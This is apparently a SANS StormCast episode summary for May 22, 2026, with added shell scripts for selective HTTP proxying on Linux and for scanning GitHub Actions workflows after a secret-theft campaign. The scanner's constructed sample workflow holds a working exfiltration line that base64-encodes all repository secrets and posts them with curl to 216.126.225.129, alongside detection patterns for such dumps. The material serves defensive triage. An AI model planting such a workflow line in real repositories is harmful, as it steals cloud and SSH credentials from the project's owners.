SANS Stormcast Friday, May 22nd, 2026: Selective HTTP Proxying; More GitHub Repo Trouble; MSFT Defender Patches;

SANS Internet StormCast


May 22, 2026

Why It Matters

Understanding how to isolate application traffic helps security teams reduce noise and focus on targeted analysis, while awareness of the GitHub Actions supply‑chain attack underscores the need for strict credential hygiene and repository monitoring. The highlighted patches from Microsoft and Cisco address high‑severity vulnerabilities that could lead to system compromise, making timely updates essential for protecting enterprise environments.

Key Takeaways

  • Proxifier works only on macOS and Windows; Linux alternatives exist.
  • Linux uses env vars, iptables, or namespaces for selective proxying.
  • GitHub Actions attacks exfiltrate API keys, tokens, and private keys.
  • Microsoft Defender update patches Red Sun and Undefend exploits.
  • Cisco Secure Workload REST API authentication bypass is rated CVSS 10; patch immediately.

Pulse Analysis

The episode opens with a deep dive into selective HTTP proxying. Proxifier, the usual tool for routing a single application through a proxy, runs only on macOS and Windows, so the host outlines three Linux workarounds: setting the http_proxy/https_proxy environment variables for just the target process (which works only for programs that honour them), using an iptables owner match to redirect one user's outbound web traffic to a transparent proxy, and running the application in its own network namespace so that its entire network stack can be intercepted. These techniques let analysts capture traffic from a single program without drowning in system‑wide noise, a practical tip for reverse engineers and red‑team operators.
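The three approaches described above, as an added example script that is not code from the ISC diary or the episode. It assumes an intercepting proxy (mitmproxy in transparent mode, or Burp) listening on 127.0.0.1:8080, a dedicated uid for the iptables method, and the 10.200.1.0/24 addresses for the namespace; the iptables and namespace functions need root, and with DRY_RUN=1 they print the commands instead of applying them.

```shell
#!/usr/bin/env bash
# Added example, not code from the ISC diary: three ways to route one program's
# HTTP(S) traffic through an intercepting proxy on Linux while the rest of the
# host stays unproxied. Assumes (not from the page) a proxy such as mitmproxy
# in transparent mode or Burp listening on PROXY_HOST:PROXY_PORT.
PROXY_HOST="${PROXY_HOST:-127.0.0.1}"
PROXY_PORT="${PROXY_PORT:-8080}"

# Run a privileged command, or only print it when DRY_RUN=1.
run_rule() {
    if [ "${DRY_RUN:-0}" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# Method 1: proxy environment variables scoped to one process.
# `env VAR=... cmd` hands the variables to the child only; the calling shell
# keeps its environment. Both spellings are set because curl reads only the
# lowercase http_proxy (it ignores uppercase HTTP_PROXY to dodge CGI
# variable poisoning) while other clients read the uppercase form.
# Caveat: a program that ignores these variables, or pins its own CA set,
# sends nothing through the proxy; confirm in the proxy log before trusting
# the capture.
proxy_env_run() {
    local url="http://${PROXY_HOST}:${PROXY_PORT}"
    env http_proxy="$url" https_proxy="$url" \
        HTTP_PROXY="$url" HTTPS_PROXY="$url" \
        no_proxy="localhost,127.0.0.1" NO_PROXY="localhost,127.0.0.1" \
        "$@"
}

# Method 2: iptables owner match. Every TCP connection to 80/443 opened by a
# process running as the given uid is redirected to the proxy's port, whether
# or not the program honours proxy variables (the proxy must run in
# transparent mode). Run the proxy under a different uid, otherwise its own
# upstream connections match the rule and loop. Needs root.
iptables_owner_rules() {
    local uid="$1" port
    for port in 80 443; do
        run_rule iptables -t nat -A OUTPUT -p tcp --dport "$port" \
            -m owner --uid-owner "$uid" \
            -j REDIRECT --to-ports "$PROXY_PORT"
    done
}

# Method 3: a network namespace joined to the host by a veth pair. The program
# sees only that link, and a PREROUTING rule on the host end redirects web
# ports to the proxy, which must listen on 10.200.1.1 or 0.0.0.0. The
# 10.200.1.0/24 addresses are an assumption; name resolution inside the
# namespace needs /etc/netns/<ns>/resolv.conf. Needs root.
netns_run() {
    local ns="$1" port
    shift
    run_rule ip netns add "$ns"
    run_rule ip link add "veth-$ns" type veth peer name veth0 netns "$ns"
    run_rule ip addr add 10.200.1.1/24 dev "veth-$ns"
    run_rule ip link set "veth-$ns" up
    run_rule ip -n "$ns" addr add 10.200.1.2/24 dev veth0
    run_rule ip -n "$ns" link set veth0 up
    run_rule ip -n "$ns" link set lo up
    run_rule ip -n "$ns" route add default via 10.200.1.1
    for port in 80 443; do
        run_rule iptables -t nat -A PREROUTING -i "veth-$ns" -p tcp \
            --dport "$port" -j REDIRECT --to-ports "$PROXY_PORT"
    done
    run_rule ip netns exec "$ns" "$@"
}

# Constructed usage (selective_proxy.sh is an assumed file name):
#   proxy_env_run curl -s https://example.com            # no root needed
#   sudo bash -c '. ./selective_proxy.sh; iptables_owner_rules 1001'
#   DRY_RUN=1 netns_run app curl -s http://example.com   # print, do not apply
```

The environment-variable method is the least invasive but also the easiest for a program to bypass; the owner-match rules catch anything the uid does on ports 80/443, and the namespace catches all of the program's traffic, so pick the method based on how cooperative the target is.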

The conversation then shifts to a fresh wave of GitHub repository compromises. Attackers use previously leaked credentials to push malicious GitHub Actions workflows that trigger on pushes, pull requests, or external dispatch events. Once active, the workflows silently collect AWS, Google, and other cloud secrets (API keys, JWTs, private SSH keys) and send them to 216.126.225.129. This supply‑chain style breach underscores the need for strict secret management (rotate anything a compromised token could have reached, and scope tokens narrowly), provenance checks on workflow changes, and continuous monitoring of repository activity, with new or modified files under .github/workflows as the first thing to review.
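A triage scan for the kind of workflow the episode describes, added here as an example rather than taken from the SafeDep write-up. The indicator list (a toJSON(secrets) dump, a bare-IP destination, base64 encoding, dispatch triggers, cloud-credential secret names) and the scoring threshold are generic assumptions, not the campaign's actual signature; the sample workflows are constructed, with the page's 216.126.225.129 used as the destination in the malicious one.

```shell
#!/usr/bin/env bash
# Added example, not code from the SafeDep write-up or the episode: a triage
# scan of a repository's GitHub Actions workflows for the traits described
# above (fires on push / pull request / dispatch, reads secrets broadly, ships
# them to a bare IP). The indicator list and the threshold are generic
# assumptions, not the campaign's signature; hits are leads, not verdicts.

# Prints "<score> <indicator> ..." for one workflow file.
workflow_score() {
    local f="$1" score=0 hits=""
    # Dumps every secret the workflow can reach in one expression.
    if grep -Eq 'toJSON\([[:space:]]*secrets[[:space:]]*\)' "$f"; then
        score=$((score + 1)); hits="$hits all-secrets-dump"
    fi
    # HTTP(S) to a bare IPv4 address instead of a named host.
    if grep -Eq 'https?://([0-9]{1,3}\.){3}[0-9]{1,3}' "$f"; then
        score=$((score + 1)); hits="$hits raw-ip-destination"
    fi
    # Encoding before sending, common for exfil and for dodging log masking.
    if grep -Eq 'base64' "$f"; then
        score=$((score + 1)); hits="$hits base64-encoding"
    fi
    # Triggers an outsider can fire, or that run fork code with a write token.
    if grep -Eq 'pull_request_target|repository_dispatch|workflow_dispatch' "$f"; then
        score=$((score + 1)); hits="$hits externally-triggerable"
    fi
    # Cloud / SSH / token secrets referenced by name.
    if grep -Eq 'secrets\.[A-Za-z0-9_]*(AWS|GOOGLE|GCP|SSH|PRIVATE|TOKEN)' "$f"; then
        score=$((score + 1)); hits="$hits cloud-credentials"
    fi
    printf '%s%s\n' "$score" "$hits"
}

# Prints the path of every workflow in DIR scoring at or above THRESHOLD (default 3).
scan_workflows() {
    local dir="$1" threshold="${2:-3}" f out
    for f in "$dir"/*.yml "$dir"/*.yaml; do
        [ -f "$f" ] || continue
        out=$(workflow_score "$f")
        [ "${out%% *}" -ge "$threshold" ] && printf '%s\n' "$f"
    done
    return 0
}

# Constructed sample workflows (not real repository content); prints the dir.
make_samples() {
    local d
    d=$(mktemp -d)
    cat >"$d/malicious.yml" <<'EOF'
name: ci
on: [push, pull_request, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo '${{ toJSON(secrets) }}' | base64 | curl -s --data-binary @- http://216.126.225.129/collect
      - run: echo "${{ secrets.AWS_SECRET_ACCESS_KEY }}" > /tmp/k
EOF
    cat >"$d/benign.yml" <<'EOF'
name: test
on: [push, pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: make test
EOF
    cat >"$d/deploy.yml" <<'EOF'
name: deploy
on:
  push:
    branches: [main]
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - run: curl -sf -H "Authorization: Bearer ${{ secrets.DEPLOY_TOKEN }}" http://10.0.0.5/deploy
EOF
    printf '%s\n' "$d"
}
```

Run `scan_workflows .github/workflows` against a checked-out repository, then pair any hit with `git log --format='%h %an %ad %s' -- .github/workflows` to see who introduced or last changed the file and whether that author and time line up with a leaked credential. The constructed deploy.yml scores 2 (bare IP plus a token secret) and stays below the default threshold, which is the point of scoring rather than single-indicator matching: an internal deploy target alone should not page anyone.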

Finally, the host reviews two critical vendor updates. Microsoft Defender's latest update addresses the Red Sun and Undefend privilege‑escalation exploits and rolls out automatically through its regular update cadence, so the practical step is to verify that endpoints have actually received it. Cisco, meanwhile, disclosed a CVSS 10 authentication bypass in the Secure Workload REST API that grants unauthenticated users full admin rights. Organizations running Secure Workload must apply the fix and keep the API off public networks. Together, these alerts illustrate how rapid patching, layered network controls, and vigilant credential hygiene remain essential pillars of modern cybersecurity strategy.

Episode Description

Selective HTTP Proxying in Linux

https://isc.sans.edu/diary/Selective%20HTTP%20Proxying%20in%20Linux/33002

https://safedep.io/megalodon-mass-github-repo-backdooring-ci-workflows/

https://x.com/fabian_bader/status/2057198207243804881

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-csw-pnbsa-g8WEnuy
